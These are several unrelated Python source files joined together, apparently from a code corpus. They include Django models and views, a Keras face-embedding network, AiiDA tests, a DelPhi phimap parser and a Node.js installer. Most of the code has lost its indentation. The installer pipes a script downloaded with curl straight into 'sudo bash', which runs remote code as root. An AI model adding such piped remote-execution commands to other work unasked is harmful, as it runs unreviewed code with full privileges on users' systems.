from django.utils import timezone
from django.conf import settings
from django.db.utils import ProgrammingError
from django.contrib.contenttypes.models import (
ContentType,
)
from django.db.models import (
Model,
CharField,
DateTimeField,
ForeignKey,
CASCADE,
TextField,
DateField,
PositiveIntegerField,
BooleanField,
Q,
)
from django.utils.translation import ugettext_lazy as _
from tagulous.models import (
TagField,
TagTreeModel,
)
EVENT_CONTENT_TYPE_CHOICES = (
Q(app_label='configs', model='abstractproduct')
| Q(app_label='configs', model='config')
)
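# The ContentType table may not exist yet (e.g. the first time migrations run),
# so fall back to a fixed id if the lookup below fails.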
try:
DEFAULT_EVENT_CONTENT_TYPE_ID = ContentType.objects.get(model='abstractproduct').id
except ProgrammingError:
DEFAULT_EVENT_CONTENT_TYPE_ID = 1
class EventType(TagTreeModel):
class TagMeta:
space_delimiter = False
autocomplete_view = 'events:api:event_type_autocomplete'
class Meta:
verbose_name = _('Event Type')
verbose_name_plural = _('Event Types')
ordering = ('level',)
def __str__(self):
return str(self.label)
def __unicode__(self):
return str(self.label)
class Event(Model):
user = ForeignKey(settings.AUTH_USER_MODEL, default=1)
content_type = ForeignKey(ContentType,
default=DEFAULT_EVENT_CONTENT_TYPE_ID,
limit_choices_to=EVENT_CONTENT_TYPE_CHOICES,
on_delete=CASCADE)
object_id = PositiveIntegerField(default=1)
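    # content_type + object_id together act as a manual generic reference to either
    # a config or an abstract product (see EVENT_CONTENT_TYPE_CHOICES above).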
types = TagField(EventType, verbose_name=_('Event Type'), help_text=_('You can create new event type here'))
name = CharField(max_length=120, unique=False, verbose_name=_('Name'))
context = TextField(verbose_name=_('Context'))
    date = DateField(auto_now=False, default=timezone.localdate, verbose_name=_('Date'))  # callable default, evaluated per save rather than at import time
share = BooleanField(default=False, verbose_name=_('Shared Event'))
update_time = DateTimeField(auto_now=True, null=True, blank=True, verbose_name=_('Updated'))
class Meta:
verbose_name = _('Event')
verbose_name_plural = _('Events')
def __str__(self):
return str(self.name)
def __unicode__(self):
return str(self.name)
|
import sys
sys.path.append('..')
import traceback
import genericBotBase.botbase as BotBase
log = BotBase.log
config = BotBase.config
bot = BotBase.bot
extensions = [
'genericBotBase.cogs.admin',
'genericBotBase.cogs.common',
'genericBotBase.cogs.basic',
'cogs.QueueCommands'
]
def main():
BotBase.loadExtensions( extensions )
BotBase.run()
if __name__ == '__main__':
main()
|
from tensorflow.keras import backend as K
from tensorflow.keras.layers import (
Input,
Conv2D,
BatchNormalization,
Layer,
PReLU,
SeparableConv2D,
DepthwiseConv2D,
add,
Flatten,
Dense,
Dropout,
GlobalAveragePooling2D,
Reshape,
Multiply,
)
from tensorflow.keras.models import Model
"""Building Block Functions"""
def se_block(inputs, reduction=16):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = inputs.shape[channel_axis]
nn = GlobalAveragePooling2D()(inputs)
nn = Reshape((1, 1, filters))(nn)
nn = Conv2D(filters // reduction, kernel_size=1)(nn)
nn = PReLU(shared_axes=[1, 2])(nn)
nn = Conv2D(filters, kernel_size=1, activation="sigmoid")(nn)
nn = Multiply()([inputs, nn])
return nn
def se_block_2(inputs, reduction=16):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
filters = inputs.shape[channel_axis]
se = GlobalAveragePooling2D()(inputs)
    se = Dense(filters // reduction, use_bias=False)(se)
    se = PReLU()(se)  # "PReLU" is not a valid activation string, so apply the layer explicitly
    se = Dense(filters, activation="sigmoid", use_bias=False)(se)
# if K.image_data_format() == 'channels_first':
# se = Permute((3, 1, 2))(se)
x = Multiply()([inputs, se])
return x
def conv_block(inputs, filters, kernel_size, strides, padding):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = Conv2D(filters, kernel_size, strides=strides, padding=padding, use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
A = PReLU(shared_axes=[1, 2])(Z)
return A
def separable_conv_block(inputs, filters, kernel_size, strides):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = SeparableConv2D(filters, kernel_size, strides=strides, padding="same", use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
A = PReLU(shared_axes=[1, 2])(Z)
return A
def bottleneck(inputs, filters, kernel, t, s, r=False, se=False):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
tchannel = K.int_shape(inputs)[channel_axis] * t
Z1 = conv_block(inputs, tchannel, 1, 1, "same")
Z1 = DepthwiseConv2D(kernel, strides=s, padding="same", depth_multiplier=1, use_bias=False)(Z1)
Z1 = BatchNormalization(axis=channel_axis)(Z1)
A1 = PReLU(shared_axes=[1, 2])(Z1)
Z2 = Conv2D(filters, 1, strides=1, padding="same", use_bias=False)(A1)
Z2 = BatchNormalization(axis=channel_axis)(Z2)
if se:
Z2 = se_block(Z2)
if r:
Z2 = add([Z2, inputs])
return Z2
def inverted_residual_block(inputs, filters, kernel, t, strides, n, se=False):
Z = bottleneck(inputs, filters, kernel, t, strides, se=se)
for i in range(1, n):
Z = bottleneck(Z, filters, kernel, t, 1, True, se=se)
return Z
def linear_GD_conv_block(inputs, kernel_size, strides):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
Z = DepthwiseConv2D(kernel_size, strides=strides, padding="valid", depth_multiplier=1, use_bias=False)(inputs)
Z = BatchNormalization(axis=channel_axis)(Z)
return Z
def mobile_facenet(
emb_shape=128, input_shape=(112, 112, 3), dropout=1, name="mobile_facenet", weight_file=None, use_se=False, include_top=True
):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
if K.image_data_format() == "channels_first":
X = Input(shape=(input_shape[-1], input_shape[0], input_shape[1]))
else:
X = Input(shape=input_shape)
M = conv_block(X, 64, 3, 2, "same") # Output Shape: (56, 56, 64)
M = separable_conv_block(M, 64, 3, 1) # (56, 56, 64)
M = inverted_residual_block(M, 64, 3, t=2, strides=2, n=5, se=use_se) # (28, 28, 64)
M = inverted_residual_block(M, 128, 3, t=4, strides=2, n=1, se=use_se) # (14, 14, 128)
M = inverted_residual_block(M, 128, 3, t=2, strides=1, n=6, se=use_se) # (14, 14, 128)
M = inverted_residual_block(M, 128, 3, t=4, strides=2, n=1, se=use_se) # (7, 7, 128)
M = inverted_residual_block(M, 128, 3, t=2, strides=1, n=2, se=use_se) # (7, 7, 128)
if include_top:
""" GDC """
M = Conv2D(512, 1, use_bias=False)(M) # (7, 7, 512)
M = BatchNormalization(axis=channel_axis)(M)
M = PReLU(shared_axes=[1, 2])(M)
M = DepthwiseConv2D(int(M.shape[1]), depth_multiplier=1, use_bias=False)(M) # (1, 1, 512)
M = BatchNormalization(axis=channel_axis)(M)
if dropout > 0 and dropout < 1:
M = Dropout(dropout)(M)
M = Conv2D(emb_shape, 1, use_bias=False, activation=None)(M)
M = Flatten()(M)
M = BatchNormalization(axis=channel_axis, name="embedding")(M)
model = Model(inputs=X, outputs=M, name=name)
if weight_file:
model.load_weights(weight_file)
return model
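# A minimal usage sketch (assumes TensorFlow 2.x and no pretrained weights): build the
# default 128-d embedding model and check the embedding output shape.
if __name__ == "__main__":
    model = mobile_facenet(emb_shape=128, input_shape=(112, 112, 3), use_se=True)
    model.summary()
    print("embedding shape:", model.output_shape)  # expected: (None, 128)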
|
# -*- coding: utf-8 -*-
import os
import pytest
from gaas_sample import *
def test_local_input(create_gaas_calc, configure_with_daemon, assert_finished):
from aiida.work.run import run
process, inputs = create_gaas_calc()
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_finished(pid)
def test_changed_seedname(
create_gaas_calc, configure_with_daemon, assert_finished
):
from aiida.work.run import run
process, inputs = create_gaas_calc(seedname='wannier90')
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_finished(pid)
def test_changed_seedname_empty_settings(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(seedname='wannier90')
inputs.settings = DataFactory('parameter')()
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.SUBMISSIONFAILED)
def test_empty_settings(create_gaas_calc, configure_with_daemon, assert_state):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc()
inputs.settings = DataFactory('parameter')()
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.FINISHED)
def test_changed_seedname_no_settings(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(seedname='wannier90')
del inputs.settings
output, pid = run(process, _return_pid=True, **inputs)
assert_state(pid, calc_states.SUBMISSIONFAILED)
def test_duplicate_exclude_bands(
create_gaas_calc, configure_with_daemon, assert_state
):
from aiida.work.run import run
from aiida.orm import DataFactory
from aiida.common.datastructures import calc_states
process, inputs = create_gaas_calc(
projections_dict={
'kind_name': 'As',
'ang_mtm_name': 's'
}
)
inputs.parameters = DataFactory('parameter')(
dict=dict(
num_wann=1,
num_iter=12,
wvfn_formatted=True,
exclude_bands=[1] * 2 + [2, 3]
)
)
output, pid = run(process, _return_pid=True, **inputs)
assert all(key in output for key in ['retrieved', 'output_parameters'])
assert_state(pid, calc_states.FAILED)
|
#!/usr/bin/env python
# ryan g. coleman, ryangc@mail.med.upenn.edu
# kim sharp lab
# phi.py enables read/write of binary phi-maps from delphi
# usage is import, then pass in filename to object creation
# extensions written in bks lab, 2012, and by extensions i mean reading
# phimap files written by a pgf, 32-bit version of delphi that is being
# used in dockblaster, etc. these files are always big-endian despite any
# claims by the OS to the contrary
import struct
import array
import sys
import string
import os
import math
import copy
#import gzip, bz2 #for compressed file reading (not enabled yet)
# format follows
# character*20 toplabel
# character*10 head,character*60 title
# real*4 phi(65,65,65) #or now 193,193,193
# character*16 botlabel
# real*4 scale, oldmid(3)
def grid_size_from_file_size(file_size):
grid_bytes = file_size - 162 # 162 is number of fixed bytes in a grid file
grid_points = grid_bytes / 4.0 # 4 bytes per float
grid_size = grid_points ** (1.0/3.0) # Cube root of grid points is size
grid_size = int(math.ceil(grid_size))
return grid_size
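# Worked example: a 65x65x65 map occupies 4 * 65**3 + 162 = 1,098,662 bytes on disk,
# and a 193-cube map occupies 4 * 193**3 + 162 = 28,756,390 bytes.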
class phi(object):
def __init__(self, phiFileName=False, is64=False, gridSizes=None):
'''reads the phi file from disk'''
if gridSizes is None:
gridSizes = (None,)
self.oldmid = [0., 0., 0.]
self.__minsmaxs = None
self.__boundaries = None
if phiFileName: # otherwise just creating an empty phi map for writing
for gridSize in gridSizes:
if gridSize is None:
gridSize = grid_size_from_file_size(os.stat(phiFileName).st_size)
print "Determined size to be", gridSize
try:
phiFile = open(phiFileName, 'rb') # b is for binary, r is for read
tempArray = array.array('f')
junk = struct.unpack('4s', phiFile.read(4))
(check,) = struct.unpack('4s', phiFile.read(4))
if check == "now ": # this changed, but this is now correct
#print "32bit phimap"
pass
else:
#print "64bit phimap"
is64 = True
if not is64:
(temptop,) = struct.unpack('16s', phiFile.read(16))
self.toplabel = check + temptop
else:
(temptop,) = struct.unpack('20s', phiFile.read(20))
self.toplabel = temptop
#print "toplabel:", self.toplabel
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
(self.head,) = struct.unpack('10s', phiFile.read(10))
#print "head:", self.head
(self.title,) = struct.unpack('60s', phiFile.read(60))
#print "title:", self.title
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
#next line raises error if grid too big
#GxGxG -> packed into an array xyz order samplePhi = array.array('f')
tempArray.fromfile(phiFile, gridSize**3)
tempArray.byteswap()
#for count in xrange(gridSize**3):
# bats = phiFile.read(4) #raw characters
# blah = struct.unpack('>f', bats)[0] #always big-endian
# tempArray.append(blah)
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
self.gridDimension = gridSize
self.phiArray = tempArray
break # read successfully, just go on and read the last bits
except EOFError:
phiFile.close()
(self.botlabel,) = struct.unpack('16s', phiFile.read(16))
#print "botlabel:", self.botlabel
junk = struct.unpack('8s', phiFile.read(8))
if is64:
junk = struct.unpack('8s', phiFile.read(8))
#>ffff on next line forces big-endian reading
(self.scale, self.oldmid[0], self.oldmid[1], self.oldmid[2],) = \
struct.unpack('>ffff', phiFile.read(16))
#print "scale, oldmid:", self.scale, self.oldmid
junk = struct.unpack('4s', phiFile.read(4))
phiFile.close()
def copyPhi(self):
'''make a deep copy of the phimap that can be edited without disturbing the
original.'''
newPhi = phi()
newPhi.oldmid = self.oldmid
newPhi.toplabel = self.toplabel
newPhi.head = self.head
newPhi.title = self.title
newPhi.botlabel = self.botlabel
newPhi.scale = self.scale
newPhi.phiArray = self.phiArray
newPhi.gridDimension = self.gridDimension
newPhi.__minsmaxs = None
newPhi.__boundaries = None
return newPhi
def write(self, phiFileName=False):
'''write data to member data structure manually,
then call this to write to file
the pad lines reproduce the binary padding of an original
fortran formatted phi file'''
if phiFileName: # do nothing if no filename given
outArray = copy.deepcopy(self.phiArray)
outArray.byteswap() # switch endianness back, only for writing
phiFile = open(phiFileName, 'wb') # b may be unnecessary, have to check
phiFile.write(struct.pack('4b', 0, 0, 0, 20)) # pad
phiFile.write(struct.pack('20s', self.toplabel))
phiFile.write(struct.pack('8b', 0, 0, 0, 20, 0, 0, 0, 70)) # pad
phiFile.write(struct.pack('10s', self.head))
phiFile.write(struct.pack('60s', self.title))
phiFile.write(struct.pack('4b', 0, 0, 0, 70)) # pad, always same
phiFile.write(struct.pack('>l', len(outArray)*4)) # diff. pad sometimes
#print "writing this many data points in phimap:", len(outArray)
outArray.tofile(phiFile) # array
phiFile.write(struct.pack('>l', len(outArray)*4)) # diff. pad sometimes
phiFile.write(struct.pack('4b', 0, 0, 0, 16)) # pad, always same
phiFile.write(struct.pack('16s', self.botlabel))
phiFile.write(struct.pack('8b', 0, 0, 0, 16, 0, 0, 0, 16)) # pad
phiFile.write(struct.pack(
'>ffff', self.scale, self.oldmid[0], self.oldmid[1], self.oldmid[2]))
#> on previous line forces big-endian writing
phiFile.write(struct.pack('4b', 0, 0, 0, 16)) # pad
phiFile.close()
def trimPhi(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, trim the current
phimap and return the new trimmed phimap'''
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
newPhi = phi()
newPhi.oldmid = self.getXYZlist(newmidIndices) # only change of these data
newPhi.toplabel = self.toplabel
newPhi.head = self.head
newPhi.title = self.title
newPhi.botlabel = self.botlabel
newPhi.scale = self.scale
#the phiArray does change
newPhi.phiArray = array.array('f')
for oldIndexZ in xrange(
newmidIndices[2] - plusMinus, newmidIndices[2] + plusMinus + 1):
for oldIndexY in xrange(
newmidIndices[1] - plusMinus, newmidIndices[1] + plusMinus + 1):
for oldIndexX in xrange(
newmidIndices[0] - plusMinus, newmidIndices[0] + plusMinus + 1):
if oldIndexX >= 0 and oldIndexX < self.gridDimension and \
oldIndexY >= 0 and oldIndexY < self.gridDimension and \
oldIndexZ >= 0 and oldIndexZ < self.gridDimension:
newPhi.phiArray.append(
self.getValue(oldIndexX, oldIndexY, oldIndexZ))
else:
newPhi.phiArray.append(0.0) # outside the original grid.
#print "total array size is:", len(newPhi.phiArray)
return newPhi
def findPhiCorners(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, find the new
corners of the phimap'''
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
lowerLeft = \
[newmidIndices[0] - plusMinus, newmidIndices[1] - plusMinus,
newmidIndices[2] - plusMinus]
upperRight = \
[newmidIndices[0] + plusMinus + 1, newmidIndices[1] + plusMinus + 1,
newmidIndices[2] + plusMinus + 1]
return lowerLeft, upperRight
def findNewPhiIndices(self, newmidIndices, newSize):
'''for a new center index and a desired cubic grid size, return xyz coords
of each coordinate in the new box'''
coordList = []
plusMinus = (newSize - 1) / 2 # how many to add or subtract from the center
for oldIndexZ in xrange(
newmidIndices[2] - plusMinus, newmidIndices[2] + plusMinus + 1):
for oldIndexY in xrange(
newmidIndices[1] - plusMinus, newmidIndices[1] + plusMinus + 1):
for oldIndexX in xrange(
newmidIndices[0] - plusMinus, newmidIndices[0] + plusMinus + 1):
coordList.append((oldIndexX, oldIndexY, oldIndexZ))
return coordList
def getMinsMaxs(self):
'''finds the positions of the extreme grid corners'''
if self.__minsmaxs is None:
mins, maxs = [], []
for center in self.oldmid:
mins.append(center - ((self.gridDimension - 1.)/(2. * self.scale)))
maxs.append(center + ((self.gridDimension - 1.)/(2. * self.scale)))
self.__minsmaxs = mins, maxs
return self.__minsmaxs
def getMinMaxValues(self):
'''finds the minimum and maximum value'''
return min(self.phiArray), max(self.phiArray)
def getMeanAbsoluteValues(self):
'''takes the abs value of each phi value, then the average'''
sum = 0.0
for value in self.phiArray:
sum += math.fabs(value)
return sum/float(len(self.phiArray))
def getMeanValues(self):
'''mean of all phi values'''
sum = 0.0
for value in self.phiArray:
sum += value
return sum/float(len(self.phiArray))
def getMaxValues(self):
'''just the max'''
return max(self.phiArray)
def countValues(self):
'''counts the occurence of each value'''
counts = {}
for value in self.phiArray:
if value in counts:
counts[value] += 1
else:
counts[value] = 1
return counts
def histogramValues(self, width=1., useMin=None, useMax=None):
'''makes a basic histogram'''
ends = list(self.getMinMaxValues())
if useMin is not None:
ends[0] = useMin
if useMax is not None:
ends[1] = useMax
bars = int(math.ceil((ends[1] - ends[0]) / width) + 1)
counts = [0 for x in xrange(bars)]
for value in self.phiArray:
if value >= ends[0] and value <= ends[1]:
counts[int(math.floor((value - ends[0]) / width))] += 1
return counts
def getXYZlist(self, xyz):
'''changes list to x,y,z calls getXYZ'''
return self.getXYZ(xyz[0], xyz[1], xyz[2])
def getXYZ(self, xInd, yInd, zInd):
'''returns the xyz coordinate of the center of the box'''
mins, maxs = self.getMinsMaxs()
gap = 1./self.scale
return mins[0]+(xInd*gap), mins[1]+(yInd*gap), mins[2]+(zInd*gap)
def getValueList(self, xyz):
'''changes list into x, y, z then calls getValue'''
return self.getValue(xyz[0], xyz[1], xyz[2])
def getValue(self, xInd, yInd, zInd):
'''for a given set of indices, return the value in the array'''
index = int(zInd*(self.gridDimension**2.) + yInd*self.gridDimension + xInd)
return self.phiArray[index]
def getValueListCheckBounds(self, xyzList, retValueIfBad=0):
'''passes to getValueCheckBounds'''
return self.getValueCheckBounds(
xyzList[0], xyzList[1], xyzList[2], retValueIfBad)
def getValueCheckBounds(self, xInd, yInd, zInd, retValueIfBad=0):
'''does grid bounds checking first, returns retValueIfBad if outside grid,
otherwise call getvalue'''
if xInd >= 0 and xInd < self.gridDimension and \
yInd >= 0 and yInd < self.gridDimension and \
zInd >= 0 and zInd < self.gridDimension:
return self.getValue(xInd, yInd, zInd)
else:
return retValueIfBad
def setValueList(self, xyz, value):
'''calls setValue with expanded xyz into items'''
self.setValue(xyz[0], xyz[1], xyz[2], value)
def setValue(self, xInd, yInd, zInd, value):
'''puts the value into the phi array'''
index = int(zInd*(self.gridDimension**2.) + yInd*self.gridDimension + xInd)
self.phiArray[index] = value
def transform(self, threshold=6.0, inside=-2.0, outside=-1.0):
'''for every value in the array, change it to inside or outside,
destructively overwrites old values'''
for index in xrange(len(self.phiArray)):
value = self.phiArray[index]
if value < threshold:
where = outside
else:
where = inside
self.phiArray[index] = where
def subtract(self, other):
'''subtract other from self, destructively write over self'''
self.modify(other, -1)
def add(self, other):
'''add other to self, destructively write over self.'''
self.modify(other, 1)
def modify(self, other, change):
'''modify other to self, destructively write over self. allows +-/etc
presume without checking that grids are compatible (same mid etc)'''
for index in xrange(len(self.phiArray)):
value = other.phiArray[index]
#save = self.phiArray[index]
self.phiArray[index] += (value * change)
#if self.phiArray[index] != 0.0:
# print self.phiArray[index], value, save, index
def findBoundaries(
self, inside=-2.0, border=2, pointXYZ=None, pointList=None):
'''finds the extreme x,y,z positions that enclose all inside positions'''
if self.__boundaries is None: # need to calculate it
if pointXYZ is not None:
self.__boundaries = self.findPointMinsMaxs(pointXYZ, pointList)
else:
self.__boundaries = [self.gridDimension, self.gridDimension,
self.gridDimension], [0, 0, 0]
for x in xrange(self.gridDimension):
for y in xrange(self.gridDimension):
for z in xrange(self.gridDimension):
if x < self.__boundaries[0][0] or x > self.__boundaries[1][0] or \
y < self.__boundaries[0][1] or y > self.__boundaries[1][1] or \
z < self.__boundaries[0][2] or z > self.__boundaries[1][2]:
value = self.getValue(x, y, z)
if value == inside:
indices = (x, y, z)
for coord in xrange(3):
self.__boundaries[0][coord] = min(
self.__boundaries[0][coord], indices[coord])
self.__boundaries[1][coord] = max(
self.__boundaries[1][coord], indices[coord])
for coord in range(3):
self.__boundaries[0][coord] = max(
0, self.__boundaries[0][coord] - border)
self.__boundaries[1][coord] = min(
self.gridDimension, self.__boundaries[1][coord]+border)
return self.__boundaries
def getBoundaryLengths(self, inside=-2.0, border=2):
'''calls findBoundaries if necessary, returns the lengths (max-min)'''
if self.__boundaries is None: # need to calculate it
self.findBoundaries(inside, border)
lengths = [self.__boundaries[1][0] - self.__boundaries[0][0],
self.__boundaries[1][1] - self.__boundaries[0][1],
self.__boundaries[1][2] - self.__boundaries[0][2]]
return lengths
def createFromGrid(
self, grid, gridSize, defaultValue=0.0, toplabel="",
head="", title="", botlabel="", lowestGridSize=65):
'''does grid->phi data structure conversion'''
self.toplabel = toplabel[:20] # easy stuff first
self.head = head[:10]
self.title = title[:60]
self.botlabel = botlabel[:16]
lens = [len(grid), len(grid[0]), len(grid[0][0])]
#have to expand to valid gridSize
newGridSize = 0
for possibleGridSize in self.gridSizes:
good = True
if possibleGridSize < lowestGridSize:
good = False
for oneLength in lens:
if oneLength > possibleGridSize:
good = False
if good:
newGridSize = possibleGridSize
self.gridDimension = newGridSize
#now take care of the grid
self.phiArray = array.array('f')
for z in xrange(self.gridDimension):
for y in xrange(self.gridDimension):
for x in xrange(self.gridDimension):
if x < lens[0] and y < lens[1] and z < lens[2]:
self.phiArray.append(grid[x][y][z][0])
else: # outside real grid
self.phiArray.append(defaultValue)
#scale and oldmid are all that is left
self.scale = 1./gridSize
for coord in xrange(3):
self.oldmid[coord] = grid[0][0][0][coord + 1] \
- (gridSize / 2.) + (self.gridDimension / self.scale) / 2.
#data should be ready for writing now
def findPointMinsMaxs(self, pointXYZ, pointList):
minsPts = pointXYZ[0][1:]
maxsPts = pointXYZ[0][1:]
for point in pointList:
xyz = pointXYZ[point-1][1:]
for coord in range(3):
minsPts[coord] = min(minsPts[coord], xyz[coord])
maxsPts[coord] = max(maxsPts[coord], xyz[coord])
newMins = list(self.getIndices(minsPts))
newMaxs = list(self.getIndices(maxsPts)) # so they initialize to pts
return newMins, newMaxs
def getIndices(self, pt):
'''helper function to find the box a point is in'''
mins, maxs = self.getMinsMaxs()
gridSize = 1./self.scale
xIndex = int(math.floor((pt[0]-mins[0])/gridSize))
yIndex = int(math.floor((pt[1]-mins[1])/gridSize))
zIndex = int(math.floor((pt[2]-mins[2])/gridSize))
#print xIndex, yIndex, zIndex, mins, pt, maxs
return xIndex, yIndex, zIndex
def trilinear_interpolation(self, point):
'''for a given point, find the box it is in, the trilinearly interpolate
and return the value at that point. this is in kT, as that is what phiMaps
hold. for usual applications, you want to take this times the charge and
0.5924 to put it in kcal/mol'''
ptX, ptY, ptZ = self.getIndices(point)
values = [0. for count in xrange(8)]
values[7] = self.getValue(ptX, ptY, ptZ)
values[6] = self.getValue(ptX, ptY, ptZ + 1) - values[7]
values[5] = self.getValue(ptX, ptY + 1, ptZ) - values[7]
values[4] = self.getValue(ptX + 1, ptY, ptZ) - values[7]
values[3] = self.getValue(ptX, ptY + 1, ptZ + 1) - values[7] - \
values[6] - values[5]
values[2] = self.getValue(ptX + 1, ptY, ptZ + 1) - values[7] - \
values[6] - values[4]
values[1] = self.getValue(ptX + 1, ptY + 1, ptZ) - values[7] - \
values[5] - values[4]
values[0] = self.getValue(ptX + 1, ptY + 1, ptZ + 1) - values[7] - \
values[6] - values[5] - values[4] - values[3] - values[2] - values[1]
gridPoint = self.getXYZ(ptX, ptY, ptZ)
fraction = [0. for count in xrange(3)]
for count in xrange(3):
fraction[count] = point[count] - gridPoint[count]
returnPhiValue = values[0] * fraction[0] * fraction[1] * fraction[2] + \
values[1] * fraction[0] * fraction[1] + \
values[2] * fraction[0] * fraction[2] + \
values[3] * fraction[1] * fraction[2] + values[4] * fraction[0] + \
values[5] * fraction[1] + values[6] * fraction[2] + values[7]
#print values, fraction, returnPhiValue
return returnPhiValue
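  # Example: for a point charge q at `point`, q * self.trilinear_interpolation(point) * 0.5924
  # gives the interaction energy in kcal/mol, per the docstring above.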
def trimToBoxCenterAndSize(self, corners, center, dimensions):
'''given a box, find the new center and size of a valid phimap based on
this current phimap'''
#print corners, center, dimensions
#print self.scale, self.oldmid
#find the midpoint and corners
centerIndices = self.getIndices(center)
newmid = self.getXYZlist(centerIndices) # becomes the new oldmid
onecorner = self.getIndices(corners[0:3])
twocorner = [coord + 1 for coord in self.getIndices(corners[3:6])]
#phimap grid can only be cubic
biggestDimension = 0
if twocorner[1] - onecorner[1] > twocorner[0] - onecorner[0]:
biggestDimension = 1
if (twocorner[2] - onecorner[2] >
twocorner[biggestDimension] - onecorner[biggestDimension]):
biggestDimension = 2
newSize = twocorner[biggestDimension] - onecorner[biggestDimension]
if 0 == newSize % 2: # if size is even, that's not allowed, so,
newSize += 1 # make it odd
return centerIndices, newSize
def trimToBox(self, corners, center, dimensions):
'''given a box (see box.py) trim so that the box is enclosed but not more.
returns the new trimmed phimap'''
centerIndices, newSize = self.trimToBoxCenterAndSize(
corners, center, dimensions)
return self.trimPhi(centerIndices, newSize), centerIndices, newSize
if -1 != string.find(sys.argv[0], "phi.py"):
#if (len(sys.argv) > 1): #want to test output of phimaps
# phiData.write(sys.argv[2])
  if (len(sys.argv) > 2):
    phiSize = int(sys.argv[2])
else:
phiSize = None
phiData = phi(sys.argv[1], gridSizes=(phiSize,))
#print phiData.countValues()
#print phiData.getMinMaxValues()
print phiData.getMeanAbsoluteValues()
print phiData.scale
print phiData.oldmid
|
from django.contrib.admin.models import LogEntry
from django.core.exceptions import PermissionDenied
from django.views import generic
class AdminActionsHistory(generic.ListView):
template_name = 'admin/actions_history.html'
model = LogEntry
context_object_name = "actions_history_list"
paginate_by = 25
def dispatch(self, request, *args, **kwargs):
if not request.user.is_staff:
raise PermissionDenied # HTTP 403
return super(AdminActionsHistory, self).dispatch(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super(AdminActionsHistory, self).get_context_data(**kwargs)
context["title"] = ""
return context
|
import os
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
#Update system
print(" ")
print(bcolors.OKGREEN + "Updating your system as sudo" + bcolors.ENDC)
print(" ")
os.system("sudo apt-get update")
#Asks for Version
print(" ")
version = input(bcolors.OKGREEN + "What version of nodejs do you want? (type the number of the version 8, 10, 11, 12):" + bcolors.ENDC)
#Check version
if version == "8":
print(bcolors.WARNING + "Installing nodejs v.8x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_8.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "10":
print(bcolors.WARNING + "Installing nodejs v.10x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "11":
print(bcolors.WARNING + "Installing nodejs v.11x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_11.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
if version == "12":
print(bcolors.WARNING + "Installing nodejs v.12x" + bcolors.ENDC)
os.system("curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -")
os.system("sudo apt-get install -y nodejs")
#Checking if version installed
print(bcolors.OKGREEN)
print("Node:")
os.system("node -v")
print(" ")
print("NPM:")
os.system("npm -v")
print(bcolors.ENDC)
#Tell the user that the process has finished
print(bcolors.OKGREEN + "The process is completed" + bcolors.ENDC)
print(" ")
print(bcolors.WARNING + "Check for any errors" + bcolors.ENDC)
print(" ")
print(bcolors.OKBLUE + "Thanks for using this tool, please ask for more installations in the github repository" + bcolors.ENDC)
print(" ")
|
from app import app, models
from datetime import datetime
task1 = models.Todoitem('Finish Flask App', 'Use a great mix of latest py.tech to finish To-Do app.', datetime.now().date(), True)
task2 = models.Todoitem('Remember the milk', 'Buy low-fat and fresh milk', datetime.now().date(), False)
print('Adding a few sample to-do tasks... done!')
models.db.session.add(task1)
models.db.session.add(task2)
models.db.session.commit()
|
import pdb
import numpy
import bag_records.records
import copy
class Bool(bag_records.records.RecordBase):
"""Record for std_msgs/Bool types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Bool, self).__init__(has_msg_time=has_msg_time, interpolate=False)
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float32(bag_records.records.RecordBase):
"""Record for std_msgs/Float32 types
"""
def __init__(self, has_msg_time=False):
"""Constructor
Arguments:
has_msg_time: optional bool indicating if this record should have
a message time. Typically false, but if this is part of a
message, then it could have a message stamp
Returns:
class instance
"""
super(Float32, self).__init__()
self._fields = {'data': [], 'bag_time': [], 'msg_time': []}
self._has_msg_time = has_msg_time
class Float32MultiArray(bag_records.records.RecordBase):
"""Record for std_msgs/Float32MultiArray types
"""
